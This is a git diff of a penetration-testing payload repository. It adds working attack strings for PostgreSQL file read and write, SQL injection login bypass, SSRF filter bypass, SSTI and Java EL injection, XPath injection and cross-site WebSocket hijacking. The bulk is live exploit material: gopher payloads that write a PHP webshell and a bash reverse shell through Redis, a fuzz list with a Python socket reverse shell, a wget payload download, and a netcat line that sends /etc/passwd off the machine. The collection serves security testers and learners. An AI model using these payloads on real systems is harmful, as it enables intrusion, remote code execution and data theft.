+SELECT lo_get(16420); -- use the OID returned from the above +SELECT * from pg_largeobject; -- or just get all the large objects and their data +``` + ## PostgreSQL File Write ```sql @@ -152,6 +174,12 @@ SELECT * FROM pentestlab; COPY pentestlab(t) TO '/tmp/pentestlab'; ``` +```sql +SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data +SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20 +SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport +``` + ## PostgreSQL Command execution ### CVE-2019–9193 @@ -180,4 +208,5 @@ SELECT system('cat /etc/passwd | nc '); * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) * [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5) * [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803) -* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9x-remote-command-execution) +* [POSTGRESQL 9.X REMOTE COMMAND EXECUTION - 26 Oct 17 - Daniel](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) +* [SQL Injection and Postgres - An Adventure to Eventual RCE - May 05, 2020 - Denis Andzakovic](https://pulsesecurity.co.nz/articles/postgres-sqli) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 25b035e..15bb292 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -31,6 +31,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) * [Authentication bypass](#authentication-bypass) + * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) @@ -288,6 +289,9 @@ tamper=name_of_the_tamper "&" "^" "*" +'--' +"--" +'--' / "--" " or ""-" " or "" " " or ""&" @@ -340,6 +344,7 @@ admin') or '1'='1'# admin') or '1'='1'/* 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 admin" -- +admin';-- azer admin" # admin"/* admin" or "1"="1 @@ -362,7 +367,7 @@ admin") or "1"="1"/* 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 ``` -## Authentication Bypass (Raw MD5) +## Authentication Bypass (Raw MD5 SHA1) When a raw md5 is used, the pass will be queried as a simple string, not a hexstring. @@ -374,6 +379,7 @@ Allowing an attacker to craft a string with a `true` statement such as `' or 'SO ```php md5("ffifdyop", true) = 'or'6�]��!r,��b +sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-! ``` Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772) @@ -382,6 +388,9 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj. ```sql SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ + +/* MySQL only */ +IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ ``` ## Routed injection diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index 428e806..dcece85 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -88,4 +88,4 @@ Note: By default this component is disabled ## References -[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) +[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) diff --git a/Server Side Template Injection/Files/SSRF_expect.svg b/Server Side Request Forgery/Files/SSRF_expect.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_expect.svg rename to Server Side Request Forgery/Files/SSRF_expect.svg diff --git a/Server Side Template Injection/Files/SSRF_url.svg b/Server Side Request Forgery/Files/SSRF_url.svg similarity index 100% rename from Server Side Template Injection/Files/SSRF_url.svg rename to Server Side Request Forgery/Files/SSRF_url.svg diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 8cc6592..0b889ec 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -15,6 +15,7 @@ * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) + * [Bypass using URL encoding](#bypass-using-url-encoding) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) @@ -30,7 +31,9 @@ * [gopher://](#gopher) * [netdoc://](#netdoc) * [SSRF exploiting WSGI](#ssrf-exploiting-wsgi) +* [SSRF exploiting Redis](#ssrf-exploiting-redis) * [SSRF to XSS](#ssrf-to-xss) +* [SSRF from XSS](#ssrf-from-xss) * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs) @@ -76,22 +79,6 @@ http://localhost:443 http://localhost:22 ``` -Advanced exploit using a redirection - -```powershell -1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com -2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP -vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 -``` - -Advanced exploit using type=url - -```powershell -Change "type=file" to "type=url" -Paste URL in text field and hit enter -Using this vulnerability users can upload images from any image URL = trigger an SSRF -``` - ## Bypassing filters ### Bypass using HTTPS @@ -177,6 +164,15 @@ http://127.1 http://127.0.1 ``` +### Bypass using URL encoding + +[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) + +```powershell +http://127.0.0.1/%61dmin +http://127.0.0.1/%2561dmin +``` + ### Bypass using bash variables (curl only) @@ -225,6 +221,30 @@ http://127.1.1.1:80#\@127.2.2.2:80/ ![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) +### Bypassing using a redirect +[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection) + +```powershell +1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1) +2. Launch the SSRF pointing to vulnerable.com/index.php?url=http://YOUR_SERVER_IP +vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1 +``` + +### Bypassing using type=url + +```powershell +Change "type=file" to "type=url" +Paste URL in text field and hit enter +Using this vulnerability users can upload images from any image URL = trigger an SSRF +``` + +### Bypassing using DNS Rebinding (TOCTOU) + +```powershell +Create a domain that change between two IPs. http://1u.ms/ exists for this purpose. +For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain: +make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms +``` ## SSRF exploitation via URL Scheme @@ -378,6 +398,32 @@ gopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py | value data | (n bytes) | | /tmp/test.py | | +## SSRF exploiting Redis + +> Redis is a database system that stores everything in RAM + +```powershell +# Getting a webshell +url=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html +url=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php +url=dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>" +url=dict://127.0.0.1:6379/SAVE + +# Getting a PHP reverse shell +gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml +gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php +gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22 +gopher://127.0.0.1:6379/_save +``` + +## SSRF exploiting PDF file + +Example with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c&feature=emb_title) + +```powershell + +``` + ## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158) @@ -389,6 +435,25 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg ``` +## SSRF from XSS + +### Using an iframe + +The content of the file will be integrated inside the PDF as an image or text. + +```html + +``` + +### Using an attachment + +Example of a PDF attachment using HTML + +1. use `` as Bio text +2. use 'Download Data' feature to get PDF +3. use `pdfdetach -saveall filename.pdf` to extract embedded resource +4. `cat attachment.bin` + ## SSRF URL for Cloud Instances ### SSRF URL for AWS Bucket @@ -407,7 +472,6 @@ DNS record ```powershell http://instance-data http://169.254.169.254 -http://metadata.nicob.net/ http://169.254.169.254.xip.io/ http://1ynrnhl.xip.io/ http://www.owasp.org.1ynrnhl.xip.io/ diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt deleted file mode 100644 index 9b7ba08..0000000 --- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt +++ /dev/null @@ -1,75 +0,0 @@ -
-
-
-
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt deleted file mode 100644 index fef3ab2..0000000 --- a/Server Side Template Injection/Intruder/ssi_quick.txt +++ /dev/null @@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz new file mode 100644 index 0000000..ced385b --- /dev/null +++ b/Server Side Template Injection/Intruder/ssti.fuzz @@ -0,0 +1,49 @@ + +{{4*4}}[[5*5]] +{{7*7}} +{{7*'7'}} +<%= 7 * 7 %> +${3*3} +${{7*7}} +@(1+2) +#{3*3} +#{ 7 * 7 } +{{dump(app)}} +{{app.request.server.all|join(',')}} +{{config.items()}} +{{ [].class.base.subclasses() }} +{{''.class.mro()[1].subclasses()}} +{{ ''.__class__.__mro__[2].__subclasses__() }} +{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %} +{{'a'.toUpperCase()}} +{{ request }} +{{self}} +<%= File.open('/etc/passwd').read %> +<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} +[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} +${"freemarker.template.utility.Execute"?new()("id")} +{{app.request.query.filter(0,0,1024,{'options':'system'})}} +{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} +{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} +{$smarty.version} +{php}echo `id`;{/php} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} +{{request|attr(["_"*2,"class","_"*2]|join)}} +{{request|attr(["__","class","__"]|join)}} +{{request|attr("__class__")}} +{{request.__class__}} +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} +${T(java.lang.System).getenv()} +${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 79c2a9f..2f88b82 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -14,9 +14,13 @@ * [Basic injection](#basic-injection) * [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables) * [Retrieve /etc/passwd](#retrieve--etc-passwd) +* [Expression Language EL](#expression-language-el) + * [Basic injection](#basic-injection) + * [Code execution](#code-execution) * [Twig](#twig) * [Basic injection](#basic-injection) * [Template format](#template-format) + * [Arbitrary File Reading](#arbitrary-file-reading) * [Code execution](#code-execution) * [Smarty](#smarty) * [Freemarker](#freemarker) @@ -40,6 +44,9 @@ * [Jinjava](#jinjava) * [Basic injection](#basic-injection) * [Command execution](#command-execution) +* [ASP.NET Razor](#aspnet-razor) + * [Basic injection](#basic-injection) + * [Command execution](#command-execution) * [References](#references) ## Tools @@ -87,6 +94,17 @@ Slim: ### Code execution +Execute code using SSTI for ERB engine. + +```ruby +<%= system('cat /etc/passwd') %> +<%= `ls /` %> +<%= IO.popen('ls /').readlines() %> +<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> +<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> +``` + + Execute code using SSTI for Slim engine. ```powershell @@ -119,6 +137,47 @@ ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ``` +## Expression Language EL + +### Basic injection + +```java +${1+1} +#{1+1} +``` + +### Code Execution + + +```java +// Common RCE payloads +''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec() +''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance().start() + +// Method using Runtime +#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} +#{session.getAttribute("rtc").setAccessible(true)} +#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} + +// Method using processbuilder +${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} +${request.getAttribute("c").add("cmd.exe")} +${request.getAttribute("c").add("/k")} +${request.getAttribute("c").add("ping x.x.x.x")} +${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} +${request.getAttribute("a")} + +// Method using Reflection & Invoke +${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} + +// Method using ScriptEngineManager one-liner +${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))} + +// Method using ScriptEngineManager +${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} +``` + + ## Twig ### Basic injection @@ -126,6 +185,8 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex ```python {{7*7}} {{7*'7'}} would result in 49 +{{dump(app)}} +{{app.request.server.all|join(',')}} ``` ### Template format @@ -142,12 +203,28 @@ $output = $twig > render ( ); ``` +### Arbitrary File Reading + +```python +"{{'/etc/passwd'|file_excerpt(1,30)}}"@ +``` + ### Code execution ```python {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} +``` + +Example with an email passing FILTER_VALIDATE_EMAIL PHP. + +```powershell +POST /subscribe?0=cat+/etc/passwd HTTP/1.1 +email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld ``` ## Smarty @@ -368,6 +445,11 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: +```python +{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} +``` + ## Jinjava ### Basic injection @@ -394,6 +476,21 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} ``` +## ASP.NET Razor + +### Basic injection + +```powershell +@(1+2) +``` + +### Command execution + +```csharp +@{ + // C# code +} +``` ## References @@ -410,3 +507,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/) +* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) +* [Expression Language injection - PortSwigger](https://portswigger.net/kb/issues/00100f20_expression-language-injection) +* [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE) +* [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) \ No newline at end of file diff --git a/Type Juggling/README.md b/Type Juggling/README.md index c51c805..7e97f99 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -42,9 +42,13 @@ var_dump(md5([])); # NULL If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By | +| Hash | “Magic” Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 0e215962017 | 0e291242476940776845150308577824 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | +| MD5 | 129581926211651571912466741651878684928 | 06da5430449f8f6f23dfc1276f722738 | Raw: ?T0D??o#??'or'8.N=? | | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | | SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) | | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) | diff --git a/Upload Insecure Files/Configuration IIS web.config/web.web.config b/Upload Insecure Files/Configuration IIS web.config/web.web.config new file mode 100644 index 0000000..6e02a37 --- /dev/null +++ b/Upload Insecure Files/Configuration IIS web.config/web.web.config @@ -0,0 +1,65 @@ + + + + + + + + + + + + + + + + + + + diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 6229f86..1ffa55c 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -65,6 +65,9 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm * `Content-Type : image/gif` * `Content-Type : image/png` * `Content-Type : image/jpeg` +- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) + + Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. ### Picture upload with LFI @@ -95,4 +98,4 @@ Touch command * [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/) * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) -* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) \ No newline at end of file +* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) diff --git a/Web Sockets/README.md b/Web Sockets/README.md index b53a7b7..c63bdd4 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -31,9 +31,36 @@ Then you can use any tools against the newly created web service, working as a p sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump ``` +## Cross-Site WebSocket Hijacking (CSWSH) + +If the WebSocket handshake is not correctly protected using a CSRF token or a +nonce, it's possible to use the authenticated WebSocket of a user on an +attacker's controlled site because the cookies are automatically sent by the +browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). + +Example exploit, hosted on an attacker's server, that exfiltrates the received +data from the WebSocket to the attacker: + +```html + +``` + +You have to adjust the code to your exact situation. E.g. if your web +application uses a `Sec-WebSocket-Protocol` header in the handshake request, +you have to add this value as a 2nd parameter to the `WebSocket` function call +in order to add this header. ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) - [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) -- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) \ No newline at end of file +- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index bcbe72e..6e0ac6d 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -28,6 +28,9 @@ x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 +search=')] | //user/*[contains(*,' +search=Har') and contains(../password,'c +search=Har') and starts-with(../password,'c ``` ## Blind Exploitation diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg new file mode 100644 index 0000000..0f7053a Binary files /dev/null and b/XSS Injection/Files/mouseover-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg new file mode 100644 index 0000000..ccd2d0f Binary files /dev/null and b/XSS Injection/Files/onclick-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg new file mode 100644 index 0000000..ad73a45 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.png b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png new file mode 100644 index 0000000..17b6266 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.jpg b/XSS Injection/Files/payload_in_all_known_metadata.jpg new file mode 100644 index 0000000..43d7b6a Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_metadata.jpg differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.png b/XSS Injection/Files/payload_in_all_known_metadata.png new file mode 100644 index 0000000..fdd55e3 Binary files /dev/null and b/XSS Injection/Files/payload_in_all_known_metadata.png differ diff --git a/XSS Injection/Files/payload_text_xss.png b/XSS Injection/Files/payload_text_xss.png new file mode 100644 index 0000000..45e17d5 Binary files /dev/null and b/XSS Injection/Files/payload_text_xss.png differ diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 1fe1978..9cdfe91 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -39,6 +39,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) - [Bypass ">" using nothing](#bypass----using-nothing) + - [Bypass "<" using <](#bypass----using-<) - [Bypass ";" using another character](#bypass-using------using-another-character) - [Bypass using HTML encoding](#bypass-using-html-encoding) - [Bypass using Katana](#bypass-using-katana) @@ -52,6 +53,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass using UTF-32](#bypass-using-utf---32) - [Bypass using BOM](#bypass-using-bom) - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) + - [Bypass using 